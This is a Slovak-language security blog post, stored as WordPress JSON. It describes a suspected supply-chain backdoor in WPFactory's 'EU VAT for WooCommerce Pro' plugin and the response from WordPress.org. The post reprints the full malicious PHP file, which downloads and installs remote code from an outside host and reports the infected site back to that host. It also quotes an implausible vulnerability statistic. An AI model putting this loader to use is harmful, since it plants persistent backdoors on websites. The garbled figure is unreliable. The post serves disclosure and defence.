{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/sk\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Bezpe\u010dnostn\u00fd \u00fatok na WPFactory: ohrozen\u00fdch je 170 000 webov\u00fdch str\u00e1nok na platforme WordPress"},"content":{"rendered":"<p>WordPress zost\u00e1va najpou\u017e\u00edvanej\u0161\u00edm syst\u00e9mom na spr\u00e1vu obsahu na svete a poh\u00e1\u0148a viac ako 40 percent v\u0161etk\u00fdch webov\u00fdch str\u00e1nok na internete. Od webov\u00fdch str\u00e1nok mal\u00fdch podnikov a osobn\u00fdch blogov a\u017e po rozsiahle podnikov\u00e9 platformy a e-commerce infra\u0161trukt\u00fary sa tento CMS stal chrbtovou kos\u0165ou modernej webovej str\u00e1nky. Jeho popularita pramen\u00ed z jeho flexibility, otvoren\u00e9ho ekosyst\u00e9mu a obrovsk\u00e9ho mno\u017estva pluginov dostupn\u00fdch na roz\u0161\u00edrenie jeho funk\u010dnosti.<\/p>\n\n\n\n<p>Av\u0161ak, tento ist\u00fd ekosyst\u00e9m sa z\u00e1rove\u0148 stal jednou z najv\u00e4\u010d\u0161\u00edch bezpe\u010dnostn\u00fdch v\u00fdziev WordPressu.<\/p>\n\n\n\n<p>V spolo\u010dnosti Ferber Enterprises n\u00e1\u0161 t\u00edm pre kyberbezpe\u010dnos\u0165 neust\u00e1le sleduje hrozby, ktor\u00e9 ovplyv\u0148uj\u00fa ekosyst\u00e9m WordPressu, preto\u017ee zranite\u013enosti v doplnkoch, \u0161abl\u00f3nach alebo dod\u00e1vate\u013esk\u00fdch re\u0165azcoch sa m\u00f4\u017eu r\u00fdchlo premeni\u0165 na rozsiahle \u00fatoky postihuj\u00face tis\u00edce webov\u00fdch str\u00e1nok po celom svete. V posledn\u00fdch rokoch sa \u00fato\u010dn\u00edci \u010doraz \u010dastej\u0161ie zameriavaj\u00fa sk\u00f4r na v\u00fdvoj\u00e1rov doplnkov a distribu\u010dn\u00e9 infra\u0161trukt\u00fary ako na jednotliv\u00e9 webov\u00e9 str\u00e1nky, \u010do umo\u017e\u0148uje \u0161\u00edrenie \u0161kodliv\u00e9ho k\u00f3du prostredn\u00edctvom d\u00f4veryhodn\u00fdch aktualiz\u00e1ci\u00ed softv\u00e9ru a ofici\u00e1lnych kan\u00e1lov na stiahnutie.<\/p>\n\n\n\n<p>Tento t\u00fd\u017ede\u0148 vypukla ve\u013ek\u00e1 kontroverzia t\u00fdkaj\u00faca sa spolo\u010dnosti WPFactory, zn\u00e1meho v\u00fdvoj\u00e1ra doplnkov pre WordPress, ktor\u00e9ho produkty s\u00fa nain\u0161talovan\u00e9 na viac ako 170 000 webov\u00fdch str\u00e1nkach po celom svete. Viac ako 80 doplnkov spojen\u00fdch s touto spolo\u010dnos\u0165ou bolo do\u010dasne zablokovan\u00fdch na port\u00e1li WordPress.org po tom, \u010do n\u00e1\u0161 t\u00edm pre kyberbezpe\u010dnos\u0165 v spolo\u010dnosti WPFactory objavil podozrenie na zadn\u00e9 vr\u00e1tka v pr\u00e9miovej verzii jedn\u00e9ho z jej doplnkov.<\/p>\n\n\n\n<p>Incident vyvolal v\u00e1\u017ene obavy v komunite WordPressu t\u00fdkaj\u00face sa bezpe\u010dnosti dod\u00e1vate\u013esk\u00e9ho re\u0165azca softv\u00e9ru, procesov kontroly pluginov a rast\u00facej sofistikovanosti \u00fatokov zameran\u00fdch na open-source ekosyst\u00e9m.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Objav podozriv\u00e9ho spr\u00e1vania doplnku<\/h2>\n\n\n\n<p>Tento probl\u00e9m sa po prv\u00fdkr\u00e1t objavil po tom, \u010do n\u00e1\u0161 t\u00edm pre kyberbezpe\u010dnos\u0165 v spolo\u010dnosti Ferber Enterprises zaznamenal nezvy\u010dajn\u00e9 spr\u00e1vanie pri testovan\u00ed pr\u00e9miovej verzie pluginu \u201eEU VAT for WooCommerce Pro\u201c, ktor\u00fd je k dispoz\u00edcii priamo na ofici\u00e1lnej webovej str\u00e1nke.<\/p>\n\n\n\n<p>Po\u010diato\u010dn\u00e9 vy\u0161etrovanie sa za\u010dalo po tom, \u010do plugin po\u010das in\u0161tal\u00e1cie vygeneroval kritick\u00fa chybu. Pri rie\u0161en\u00ed probl\u00e9mu na\u0161i analytici identifikovali podozriv\u00fd PHP s\u00fabor s n\u00e1zvom class-alg-wc-eu-vat-customer.php. Zd\u00e1 sa, \u017ee s\u00fabor vykon\u00e1val spr\u00e1vanie, ktor\u00e9 bolo \u00faplne v rozpore s o\u010dak\u00e1vanou funkcionalitou WooCommerce pluginu pre DPH.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Pod\u013ea na\u0161ej anal\u00fdzy sa k\u00f3d pok\u00fasil:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Stiahnite si extern\u00fd arch\u00edv ZIP zo vzdialen\u00e9ho servera<\/li>\n\n\n\n<li>Upravova\u0165 adres\u00e1re jadra WordPressu<\/li>\n\n\n\n<li>Komunikova\u0165 s externou infra\u0161trukt\u00farou<\/li>\n\n\n\n<li>Potenci\u00e1lne spusti\u0165 vzdialen\u00e9 n\u00e1klady na postihnut\u00fdch webov\u00fdch str\u00e1nkach<\/li>\n<\/ul>\n\n\n\n<p>Tieto indik\u00e1tory okam\u017eite nazna\u010dovali mo\u017en\u00fa pr\u00edtomnos\u0165 skryt\u00e9ho zadn\u00fdch vr\u00e1t alebo \u0161kodliv\u00e9ho kompromisu dod\u00e1vate\u013esk\u00e9ho re\u0165azca.<\/p>\n\n\n\n<p>Situ\u00e1ciu robilo obzvl\u00e1\u0161\u0165 znepokojuj\u00facou to, \u017ee tento doplnok nebol z\u00edskan\u00fd z neofici\u00e1lneho zrkadla ani z neleg\u00e1lneho repozit\u00e1ra. Bal\u00edk bol stiahnut\u00fd priamo z ofici\u00e1lneho z\u00e1kazn\u00edckeho port\u00e1lu spolo\u010dnosti WPFactory, \u010do e\u0161te viac posilnilo obavy, \u017ee samotn\u00fd distribu\u010dn\u00fd kan\u00e1l mohol by\u0165 napadnut\u00fd.<\/p>\n\n\n\n<p>V spolo\u010dnosti Ferber Enterprises sme incident okam\u017eite zdokumentovali a za\u010dali sme proces zodpovedn\u00e9ho oznamovania t\u00fdm, \u017ee sme sa obr\u00e1tili priamo na spolo\u010dnos\u0165 WPFactory prostredn\u00edctvom GitHubu.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Prv\u00e1 reakcia od WPFactory<\/h2><\/div>\n\n\n\n<p>Spolo\u010dnos\u0165 WPFactory spo\u010diatku reagovala vyhl\u00e1sen\u00edm, \u017ee podozriv\u00fd s\u00fabor a spr\u00e1vanie op\u00edsan\u00e9 v spr\u00e1ve neboli s\u00fa\u010das\u0165ou ich ofici\u00e1lneho zdrojov\u00e9ho k\u00f3du.<\/p>\n\n\n\n<p>Z\u00e1stupca spolo\u010dnosti navrhol nieko\u013eko alternat\u00edvnych vysvetlen\u00ed, vr\u00e1tane:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Upraven\u00e1 lok\u00e1lna in\u0161tal\u00e1cia<\/li>\n\n\n\n<li>Kompromitovan\u00e9 prostredie webovej str\u00e1nky<\/li>\n\n\n\n<li>Zastaral\u00e1 verzia doplnku<\/li>\n\n\n\n<li>Potenci\u00e1lne pozmenen\u00e1 zdroj s\u0165ahovania<\/li>\n<\/ul>\n\n\n\n<p>Spolo\u010dnos\u0165 tie\u017e uviedla, \u017ee nebola schopn\u00e1 bezpe\u010dne skontrolova\u0165 poskytnut\u00fd ZIP s\u00fabor, preto\u017ee jej prehliada\u010d ozna\u010dil arch\u00edv ako potenci\u00e1lne nebezpe\u010dn\u00fd.<\/p>\n\n\n\n<p>N\u00e1\u0161 t\u00edm pre kyberbezpe\u010dnos\u0165 n\u00e1sledne objasnil, \u017ee tento doplnok bol stiahnut\u00fd priamo z ofici\u00e1lnej webovej str\u00e1nky WPFactory a \u017ee podozriv\u00fd s\u00fabor zostal pr\u00edtomn\u00fd aj po stiahnut\u00ed novej k\u00f3pie verzie 4.6.1 z toho ist\u00e9ho zdroja.<\/p>\n\n\n\n<p>Tento detail sa stal k\u013e\u00fa\u010dov\u00fdm pre vy\u0161etrovanie. Ak viacero nez\u00e1visl\u00fdch stiahnut\u00ed z ofici\u00e1lneho distribu\u010dn\u00e9ho kan\u00e1la obsahovalo konzistentne ten ist\u00fd podozriv\u00fd k\u00f3d, pravdepodobnos\u0165 napadnutia lok\u00e1lnej webovej str\u00e1nky sa st\u00e1vala \u010doraz menej pravdepodobnou. Napriek t\u00fdmto zisteniam spolo\u010dnos\u0165 WPFactory spo\u010diatku uviedla, \u017ee sa jej nepodarilo tento probl\u00e9m na svojej strane reprodukova\u0165, a tvrdila, \u017ee podozriv\u00fd s\u00fabor v ofici\u00e1lnom bal\u00edku doplnkov neexistuje.<\/p>\n\n\n\n<p>Spolo\u010dnos\u0165 n\u00e1sledne po\u017eiadala o pr\u00edstup spr\u00e1vcu a FTP k dotknut\u00e9mu prostrediu, aby mohla pokra\u010dova\u0165 vo vy\u0161etrovan\u00ed. V spolo\u010dnosti Ferber Enterprises sme t\u00fato \u017eiados\u0165 zamietli z d\u00f4vodov kyberbezpe\u010dnosti. Poskytnutie privilegovan\u00e9ho pr\u00edstupu k serveru dod\u00e1vate\u013eovi, ktor\u00e9ho infra\u0161trukt\u00fara mohla by\u0165 sama o sebe ohrozen\u00e1, by predstavovalo neprijate\u013en\u00e9 bezpe\u010dnostn\u00e9 riziko. Namiesto toho n\u00e1\u0161 t\u00edm pokra\u010doval v poskytovan\u00ed technick\u00fdch d\u00f4kazov, vr\u00e1tane videonahr\u00e1vky, ktor\u00e1 zachyt\u00e1vala podozriv\u00e9 spr\u00e1vanie pluginu bezprostredne po in\u0161tal\u00e1cii.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Eskal\u00e1cia na WordPress.org<\/h2><\/div>\n\n\n\n<p>V priebehu vy\u0161etrovania narastali obavy t\u00fdkaj\u00face sa mo\u017en\u00e9ho rozsahu tohto probl\u00e9mu. Spolo\u010dnos\u0165 WPFactory spravuje rozsiahle portf\u00f3lio doplnkov, ktor\u00e9 zah\u0155\u0148a viac ako 65 doplnkov s celkov\u00fdm po\u010dtom vy\u0161e 170 000 akt\u00edvnych in\u0161tal\u00e1ci\u00ed. Ak\u00e9ko\u013evek naru\u0161enie distribu\u010dnej infra\u0161trukt\u00fary spolo\u010dnosti by preto mohlo ma\u0165 rozsiahle d\u00f4sledky v celom ekosyst\u00e9me WordPressu.<\/p>\n\n\n\n<p>N\u00e1\u0161 t\u00edm post\u00fapil tento probl\u00e9m priamo na WordPress.org s cie\u013eom zabr\u00e1ni\u0165 tomu, aby \u010fal\u0161\u00ed pou\u017e\u00edvatelia in\u0161talovali potenci\u00e1lne ohrozen\u00e9 bal\u00edky, k\u00fdm prebieha vy\u0161etrovanie. WordPress.org n\u00e1sledne prijal mimoriadne opatrenie a do\u010dasne zablokoval viac ako 80 pluginov WPFactory v ofici\u00e1lnom repozit\u00e1ri.<\/p>\n\n\n\n<p>Tento krok okam\u017eite up\u00fatal pozornos\u0165 celej bezpe\u010dnostnej komunity WordPressu, preto\u017ee hromadn\u00e9 pozastavenie pluginov v takomto rozsahu je pomerne zriedkav\u00e9 a zvy\u010dajne nazna\u010duje v\u00e1\u017ene nevyrie\u0161en\u00e9 probl\u00e9my. Po eskal\u00e1cii situ\u00e1cie spolo\u010dnos\u0165 WPFactory nesk\u00f4r uznala, \u017ee probl\u00e9m sa javil ako opr\u00e1vnen\u00fd, a ospravedlnila sa za to, \u017ee na p\u00f4vodn\u00e9 hl\u00e1senie nezareagovala r\u00fdchlej\u0161ie. Z\u00e1stupcovia spolo\u010dnosti uviedli, \u017ee z\u00e1le\u017eitos\u0165 akt\u00edvne vy\u0161etruj\u00fa a pracuj\u00fa na jej vyrie\u0161en\u00ed. Jedna z hypot\u00e9z, ktor\u00fa interne vyslovila spolo\u010dnos\u0165 WPFactory, nazna\u010dovala, \u017ee prostredn\u00edctvom ich infra\u0161trukt\u00fary mohol by\u0165 ne\u00famyselne poskytnut\u00fd zastaran\u00fd alebo ulo\u017een\u00fd v cache bal\u00edk pluginov.<\/p>\n\n\n\n<p>Av\u0161ak n\u00e1\u0161 t\u00edm pre kybernetick\u00fa bezpe\u010dnos\u0165 s t\u00fdmto hodnoten\u00edm nes\u00fahlasil. Pozorovan\u00e9 spr\u00e1vanie silno nazna\u010dovalo hlb\u0161\u00ed bezpe\u010dnostn\u00fd probl\u00e9m, ktor\u00fd potenci\u00e1lne zah\u0155\u0148a kompromitovan\u00e9 buildovacie potrubia, distribu\u010dn\u00e9 syst\u00e9my alebo neopr\u00e1vnen\u00e9 vstrekovanie k\u00f3du do arch\u00edvov s\u0165ahovate\u013en\u00fdch pluginov.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Pre\u010do na tomto incidente z\u00e1le\u017e\u00ed<\/h2>\n\n\n\n<p>Kontroverzia okolo WPFactory poukazuje na rast\u00facu hrozbu v oblasti kyberbezpe\u010dnosti, zn\u00e1mu ako \u00fatok na softv\u00e9rov\u00fd dod\u00e1vate\u013esk\u00fd re\u0165azec. \u00dato\u010dn\u00edci sa tradi\u010dne zameriavali na napadnutie jednotliv\u00fdch webov\u00fdch str\u00e1nok priamo prostredn\u00edctvom \u00fatokov hrubou silou alebo zranite\u013enost\u00ed pluginov. Dnes sa \u00fato\u010dn\u00edci \u010doraz \u010dastej\u0161ie zameriavaj\u00fa priamo na dod\u00e1vate\u013eov softv\u00e9ru, preto\u017ee napadnutie d\u00f4veryhodn\u00e9ho dod\u00e1vate\u013ea umo\u017e\u0148uje \u0161\u00edrenie \u0161kodliv\u00e9ho k\u00f3du na tis\u00edce webov\u00fdch str\u00e1nok s\u00fa\u010dasne.<\/p>\n\n\n\n<p>T\u00e1to strat\u00e9gia bola u\u017e pozorovan\u00e1 pri nieko\u013ek\u00fdch v\u00fdznamn\u00fdch incidentoch v oblasti kybernetickej bezpe\u010dnosti, ktor\u00e9 postihli glob\u00e1lne softv\u00e9rov\u00e9 ekosyst\u00e9my po\u010das posledn\u00e9ho desa\u0165ro\u010dia. Konkr\u00e9tne v ekosyst\u00e9me WordPress predstavuj\u00fa v\u00fdvoj\u00e1ri doplnkov atrakt\u00edvne ciele, preto\u017ee doplnky s\u00fa administr\u00e1tormi v z\u00e1sade d\u00f4veryhodne a \u010dasto pracuj\u00fa s roz\u0161\u00edren\u00fdmi povoleniami.<\/p>\n\n\n\n<p>Ak sa do bal\u00edka pluginu distribuovan\u00e9ho prostredn\u00edctvom ofici\u00e1lneho kan\u00e1la dostane \u0161kodliv\u00fd k\u00f3d, postihnut\u00e9 webov\u00e9 str\u00e1nky m\u00f4\u017eu bez toho, aby si to uvedomili, samy nain\u0161talova\u0165 \u0161kodliv\u00fd softv\u00e9r. V pr\u00edpade podozriv\u00e9ho pluginu WPFactory s\u00fa potenci\u00e1lne d\u00f4sledky z\u00e1va\u017en\u00e9.<\/p>\n\n\n\n<p>Na z\u00e1klade na\u0161ej anal\u00fdzy by identifikovan\u00e9 spr\u00e1vanie teoreticky mohlo \u00fato\u010dn\u00edkom umo\u017eni\u0165:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nasa\u010fte \u010fal\u0161\u00ed \u0161kodliv\u00fd softv\u00e9r<\/li>\n\n\n\n<li>Vstrekn\u00fa\u0165 SEO spam<\/li>\n\n\n\n<li>Vytvori\u0165 perzistentn\u00e9 zadn\u00e9 vr\u00e1tka<\/li>\n\n\n\n<li>Exfiltrova\u0165 citliv\u00e9 \u00fadaje<\/li>\n\n\n\n<li>Upravova\u0165 nain\u0161talovan\u00fd WordPress na dia\u013eku<\/li>\n\n\n\n<li>Udr\u017ea\u0165 neopr\u00e1vnen\u00fd pr\u00edstup po\u010das dlh\u00fdch \u010dasov\u00fdch obdob\u00ed<\/li>\n<\/ul>\n\n\n\n<p>Nebezpe\u010denstvo tak\u00fdchto \u00fatokov spo\u010d\u00edva v ich nen\u00e1padnosti. Modern\u00e9 zadn\u00e9 vr\u00e1tka s\u00fa \u010dasto navrhnut\u00e9 tak, aby zostali neakt\u00edvne cel\u00e9 mesiace pred aktiv\u00e1ciou, \u010do zna\u010dne s\u0165a\u017euje ich detekciu. Za\u010diatkom tohto mesiaca vraj t\u00edm WordPress Plugins uzavrel viac ako 30 pluginov po tom, \u010do skryt\u00fd \u0161kodliv\u00fd k\u00f3d vlo\u017een\u00fd v portf\u00f3liu in\u00e9ho pluginu zostal neakt\u00edvny pribli\u017ene osem mesiacov, predt\u00fdm ako sa nakoniec aktivoval a vniesol SEO spam na webov\u00e9 str\u00e1nky.<\/p>\n\n\n\n<p>Tento trend demon\u0161truje, ako \u00fato\u010dn\u00edci \u010doraz viac uprednost\u0148uj\u00fa perzistenciu a odlo\u017een\u00fa aktiv\u00e1ciu, aby sa vyhli mechanizmom detekcie.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">\u0160ir\u0161ia bezpe\u010dnostn\u00e1 kr\u00edza v ekosyst\u00e9me WordPress<\/h2><\/div>\n\n\n\n<p>Incident WPFactory z\u00e1rove\u0148 poukazuje na \u0161ir\u0161ie syst\u00e9mov\u00e9 bezpe\u010dnostn\u00e9 probl\u00e9my, ktor\u00e9 sa t\u00fdkaj\u00fa cel\u00e9ho prostredia WordPress. Ekosyst\u00e9m doplnkov sa za posledn\u00e9 desa\u0165ro\u010die v\u00fdrazne rozr\u00e1stol a na ofici\u00e1lnych aj komer\u010dn\u00fdch trhoch s\u00fa k dispoz\u00edcii desiatky tis\u00edc doplnkov. Hoci tento ekosyst\u00e9m podporuje inov\u00e1cie a flexibilitu, z\u00e1rove\u0148 v\u00fdrazne s\u0165a\u017euje doh\u013ead nad bezpe\u010dnos\u0165ou.<\/p>\n\n\n\n<p>Pod\u013ea spr\u00e1vy spolo\u010dnosti Patchstack s n\u00e1zvom \u201cStav bezpe\u010dnosti WordPressu v roku 2026\u201d nebolo takmer 461 mili\u00f3nov zn\u00e1mych zranite\u013enost\u00ed opraven\u00fdch e\u0161te pred ich zverejnen\u00edm. T\u00e1to \u0161tatistika odzrkad\u013euje rast\u00face za\u0165a\u017eenie, ktor\u00e9mu \u010delia v\u00fdvoj\u00e1ri doplnkov, bezpe\u010dnostn\u00ed v\u00fdskumn\u00edci aj spr\u00e1vcovia repozit\u00e1rov.<\/p>\n\n\n\n<p>V rovnakom \u010dase ofici\u00e1lny rad na kontrolu pluginov WordPress \u00fadajne presahuje 4 000 pluginov \u010dakaj\u00facich na kontrolu. Tak\u00e9to \u010d\u00edsla ilustruj\u00fa obrovsk\u00fa v\u00fdzvu pri udr\u017eiavan\u00ed zabezpe\u010denia kvality a bezpe\u010dnostn\u00e9ho auditu vo ve\u013ekom meradle.<\/p>\n\n\n\n<p>Mnoh\u00ed v\u00fdvoj\u00e1ri pluginov s\u00fa mal\u00e9 t\u00edmy s obmedzen\u00fdmi zdrojmi v oblasti bezpe\u010dnosti. In\u00ed spravuj\u00fa desiatky pluginov s\u00fa\u010dasne a z\u00e1rove\u0148 realizuj\u00fa agres\u00edvne strat\u00e9gie komer\u010dn\u00e9ho rastu, ktor\u00e9 zah\u0155\u0148aj\u00fa akviz\u00edcie a roz\u0161irovanie portf\u00f3lia. Samotn\u00e1 spolo\u010dnos\u0165 WPFactory sa ned\u00e1vno rozr\u00e1stla prostredn\u00edctvom akviz\u00edci\u00ed, medzi ktor\u00e9 patrilo v roku 2025 odk\u00fapenie spolo\u010dnosti Extend-WP a jej 19 pluginov, na \u010do nesk\u00f4r v tom istom roku nadviazala akviz\u00edcia spolo\u010dnosti WBW a nieko\u013ek\u00fdch \u010fal\u0161\u00edch pluginov.<\/p>\n\n\n\n<p>R\u00fdchla expanzia portf\u00f3lia m\u00f4\u017ee vytvori\u0165 prev\u00e1dzkov\u00fa zlo\u017eitos\u0165, ktor\u00e1 komplikuje audit k\u00f3du, spr\u00e1vu infra\u0161trukt\u00fary a overovanie integrity vydan\u00ed. \u00dato\u010dn\u00edci si tieto skuto\u010dnosti plne uvedomuj\u00fa. \u010coraz \u010dastej\u0161ie sa zameriavaj\u00fa na zneu\u017e\u00edvanie slab\u00fdch prakt\u00edk opera\u010dnej bezpe\u010dnosti v r\u00e1mci dod\u00e1vate\u013eov softv\u00e9ru, namiesto toho, aby priamo cielili na koncov\u00fdch pou\u017e\u00edvate\u013eov.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Rast\u00faci v\u00fdznam bezpe\u010dnosti dod\u00e1vate\u013esk\u00e9ho re\u0165azca<\/h2>\n\n\n\n<p>Incidenty ako tento posil\u0148uj\u00fa naliehav\u00fa potrebu silnej\u0161\u00edch bezpe\u010dnostn\u00fdch postupov dod\u00e1vate\u013esk\u00e9ho re\u0165azca v celom ekosyst\u00e9me WordPressu.<\/p>\n\n\n\n<p>V spolo\u010dnosti Ferber Enterprises n\u00e1\u0161 t\u00edm pre kyberbezpe\u010dnos\u0165 d\u00f4razne odpor\u00fa\u010da, aby v\u00fdvoj\u00e1ri doplnkov zaviedli nieko\u013eko k\u013e\u00fa\u010dov\u00fdch bezpe\u010dnostn\u00fdch opatren\u00ed, medzi ktor\u00e9 patria:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kryptografick\u00e9 podpisovanie bal\u00edkov<\/li>\n\n\n\n<li>Zabezpe\u010den\u00e9 CI\/CD piplajny<\/li>\n\n\n\n<li>Povinn\u00e9 viacfaktorov\u00e9 overenie<\/li>\n\n\n\n<li>Segment\u00e1cia infra\u0161trukt\u00fary<\/li>\n\n\n\n<li>Nepretr\u017eit\u00e9 monitorovanie integrity<\/li>\n\n\n\n<li>Nez\u00e1visl\u00e9 audity k\u00f3du<\/li>\n\n\n\n<li>Reprodukovate\u013en\u00e9 syst\u00e9my zostavovania<\/li>\n<\/ul>\n\n\n\n<p>Spr\u00e1vcovia webov\u00fdch str\u00e1nok by mali tie\u017e posilni\u0165 svoje vlastn\u00e9 bezpe\u010dnostn\u00e9 opatrenia. Dokonca ani doplnky stiahnut\u00e9 z ofici\u00e1lnych alebo d\u00f4veryhodn\u00fdch zdrojov by sa nemali pova\u017eova\u0165 za bezpe\u010dn\u00e9.<\/p>\n\n\n\n<p>Organiz\u00e1cie spravuj\u00face kritick\u00e9 WordPress infra\u0161trukt\u00fary by mali zv\u00e1\u017ei\u0165:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Udr\u017eiavanie staging prostred\u00ed<\/li>\n\n\n\n<li>Monitorovanie odch\u00e1dzaj\u00facej prev\u00e1dzky<\/li>\n\n\n\n<li>Skenovanie doplnkov pred nasaden\u00edm<\/li>\n\n\n\n<li>Limitovanie pou\u017e\u00edvania doplnkov<\/li>\n\n\n\n<li>Uplat\u0148ovanie kontroly najni\u017e\u0161\u00edch privil\u00e9gi\u00ed<\/li>\n\n\n\n<li>Implement\u00e1cia monitorovania integrity s\u00faborov<\/li>\n\n\n\n<li>Pou\u017e\u00edvanie spravovan\u00fdch firewallov webov\u00fdch aplik\u00e1ci\u00ed (WAF)<\/li>\n<\/ul>\n\n\n\n<p>V podnikov\u00fdch prostrediach sa valid\u00e1cia dod\u00e1vate\u013esk\u00e9ho re\u0165azca st\u00e1va rovnako d\u00f4le\u017eitou ako tradi\u010dn\u00e9 riadenie zranite\u013enost\u00ed. Predpoklad, \u017ee ofici\u00e1lne softv\u00e9rov\u00e9 kan\u00e1ly s\u00fa v\u017edy bezpe\u010dn\u00e9, u\u017e v s\u00fa\u010dasnom prostred\u00ed hrozieb nie je realistick\u00fd.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reakcie komunity a prebiehaj\u00face vy\u0161etrovanie<\/h2>\n\n\n\n<p>Kontroverzia sa r\u00fdchlo roz\u0161\u00edrila v komunite WordPress po tom, ako v\u00fdvoj\u00e1ri, bezpe\u010dnostn\u00ed v\u00fdskumn\u00edci a poskytovatelia infra\u0161trukt\u00fary za\u010dali o probl\u00e9me verejne diskutova\u0165.<\/p>\n\n\n\n<p>Nieko\u013eko zn\u00e1mych osobnost\u00ed v r\u00e1mci ekosyst\u00e9mu zv\u00fd\u0161ilo povedomie o situ\u00e1cii, vr\u00e1tane v\u00fdvoj\u00e1rov, ktor\u00ed zverejnili zoznamy do\u010dasne zatvoren\u00fdch doplnkov a povzbudili administr\u00e1torov k auditu svojich prostred\u00ed.<\/p>\n\n\n\n<p>Medzit\u00fdm n\u00e1\u0161 t\u00edm v Ferber Enterprises pokra\u010duje v anal\u00fdze podozriv\u00fdch vzoriek pluginov a sleduje \u010fal\u0161ie indik\u00e1tory napadnutia, ktor\u00e9 by mohli ovplyvni\u0165 webov\u00e9 str\u00e1nky WordPress po celom svete.<\/p>\n\n\n\n<p>V \u010dase zverejnenia spolo\u010dnos\u0165 WPFactory potvrdila existenciu tohto probl\u00e9mu a uviedla, \u017ee akt\u00edvne pracuje na jeho vyrie\u0161en\u00ed.<\/p>\n\n\n\n<p>Av\u0161ak mnoh\u00e9 ot\u00e1zky zost\u00e1vaj\u00fa nezodpovedan\u00e9:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Bola ofici\u00e1lna distribu\u010dn\u00e1 infra\u0161trukt\u00fara kompromitovan\u00e1?<\/li>\n\n\n\n<li>Ako dlho boli potenci\u00e1lne distribuovan\u00e9 \u0161kodliv\u00e9 bal\u00ed\u010dky?<\/li>\n\n\n\n<li>Boli ovplyvnen\u00e9 aj \u010fal\u0161ie pluginy?<\/li>\n\n\n\n<li>Boli narazen\u00e9 z\u00e1kazn\u00edcke \u00fa\u010dty alebo s\u0165ahovacie syst\u00e9my?<\/li>\n\n\n\n<li>Z\u00edskali \u00fato\u010dn\u00edci trval\u00fd pr\u00edstup k vn\u00fatornej infra\u0161trukt\u00fare?<\/li>\n\n\n\n<li>Mohli by 